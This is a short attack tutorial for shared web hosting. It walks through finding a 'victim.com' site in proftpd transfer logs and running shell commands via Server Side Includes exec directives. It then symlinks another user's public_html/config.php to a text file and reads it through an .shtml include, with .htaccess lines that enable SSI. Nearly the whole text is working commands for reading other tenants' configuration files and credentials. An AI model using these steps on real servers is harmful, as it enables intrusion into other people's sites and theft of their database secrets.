Shtml Bypass View Symlink - Server Side Includes

I. Server Side Includes
II. Find Victim:

cd /var/log/proftpd

more xferlog.*|grep victim.com

cat xferlog.*|grep victim.com

or go to step IV

<!--#exec cmd="more xferlog.*|grep victim.com" -->

III. Symlink:

ln -s /home/...../public_html/config.php config.txt

or go to step IV

<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->

IV. View - Use Server Side Includes:
Create cmd.shtml with content:

<!--#include virtual="config.txt" -->

V. Note:
.htaccess

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml